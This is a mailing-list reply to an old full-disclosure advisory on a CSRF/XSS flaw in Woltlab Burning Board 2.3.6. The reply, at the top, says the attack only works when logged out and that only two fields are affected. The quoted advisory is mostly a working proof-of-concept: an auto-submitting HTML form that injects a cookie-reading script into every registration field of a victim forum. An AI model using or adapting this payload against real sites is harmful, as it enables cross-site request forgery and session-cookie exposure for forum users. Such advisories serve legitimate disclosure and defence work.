Re: Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
On my WBB 2.3.3 (and i think, this is the default setting) you cannot
access register.php when logged in (even as admin). So you need to be
logged off to open the evil site. And when you are logged off, the
cookie is simply useless.
Also, on my Forum, only r_dateformat and r_timeformat are affected.
regards
2007/3/2, SaMuschie <samuschie@yahoo.de>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> +--------------------------------------- - -- -
> | SaMuschie Research Labs proudly presents . . .
> +------------------------------------------- -- - -
> | Application: Woltlab Burning Board (wbb)
> | Version: 2.3.6 (others not testet)
> | Vuln./Exploit Type: CSRF/XSS
> | Status: 0day
> +----------------------------------------- -- - -
> | Discovered by: Samenspender
> | Released: 20070302
> | SaMuschie Release Number: 5
> +------------------------------- - -- -
>
> CSRF/XSS Exploit:
>
> cat <<EOF > wetpussy.html
> <form name=3D'evilform' method=3D'POST' action=3D'http://victimhost/wbb2/=
register.php'>
> <input type=3Dhidden name=3Dr_username value=3D'"><script>alert("Cookie: =
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_email value=3D'"><script>alert("Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_password value=3D'"><script>alert("Cookie: =
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_confirmpassword value=3D'"><script>alert("C=
ookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dkey_string value=3D'"><script>alert("Cookie: =
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dkey_number value=3D'"><script>alert("Cookie: =
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_homepage value=3D'"><script>alert("Cookie: =
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_icq value=3D'"><script>alert("Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_aim value=3D'"><script>alert("Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_yim value=3D'"><script>alert("Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_msn value=3D'"><script>alert("Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_day value=3D'"><script>alert("Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_month value=3D'"><script>alert("Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_year value=3D'"><script>alert("Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_gender value=3D'"><script>alert("Cookie: " =
+
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_signature value=3D'"><script>alert("Cookie:=
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Ddisablesmilies value=3D'"><script>alert("Cook=
ie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Ddisablebbcode value=3D'"><script>alert("Cooki=
e: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Ddisableimages value=3D'"><script>alert("Cooki=
e: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_usertext value=3D'"><script>alert("Cookie: =
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dfield%5B1%5D value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dfield%5B2%5D value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dfield%5B3%5D value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_invisible value=3D'"><script>alert("Cookie:=
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_usecookies value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_admincanemail value=3D'"><script>alert("Coo=
kie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_showemail value=3D'"><script>alert("Cookie:=
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_usercanemail value=3D'"><script>alert("Cook=
ie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_emailnotify value=3D'"><script>alert("Cooki=
e: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_notificationperpm value=3D'"><script>alert(=
"Cookie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_receivepm value=3D'"><script>alert("Cookie:=
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_emailonpm value=3D'"><script>alert("Cookie:=
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_pmpopup value=3D'"><script>alert("Cookie: "=
+
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_showsignatures value=3D'"><script>alert("Co=
okie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_showavatars value=3D'"><script>alert("Cooki=
e: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_showimages value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_daysprune value=3D'"><script>alert("Cookie:=
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_umaxposts value=3D'"><script>alert("Cookie:=
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_threadview value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_dateformat value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_timeformat value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_startweek value=3D'"><script>alert("Cookie:=
" +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_timezoneoffset value=3D'"><script>alert("Co=
okie: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_usewysiwyg value=3D'"><script>alert("Cookie=
: " +
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_styleid value=3D'"><script>alert("Cookie: "=
+
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dr_langid value=3D'"><script>alert("Cookie: " =
+
> document.cookie)</script><lol=3D"'>
> <input type=3Dhidden name=3Dsend value=3D'send'>
> <input type=3Dhidden name=3Dsid value=3D''>
> <input type=3Dhidden name=3Ddisclaimer value=3D'viewed'>
> </form>
> <body onload=3Djavascript:document.forms['evilform'].submit();>
> EOF
>
> +----------------------------- -- -
> | Lameness Disclaimer
> +------------------------------------- - -- - -
> | SaMuschie Research Labs was founded to publish
> | vulnerabilities within well known software products,
> | which are easy to discover and exploit.
> |
> | SaMuschie researchers just spend a minimum of time
> | and knowledge for each vulnerability. Hence readers of
> | this advisory are requested not to ask any questions
> | to the researchers.... they don't know the answer ;)
> +---------------------------------- - -- - -
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD
> Qg6at+bMTnvHbw0SYyXk5ko=3D
> =3D7wPg
> -----END PGP SIGNATURE-----
>
>
>
>
>
>
> ___________________________________________________________
> Der fr=FChe Vogel f=E4ngt den Wurm. Hier gelangen Sie zum neuen Yahoo! Ma=
il: http://mail.yahoo.de
>
>
討論串 (同標題文章)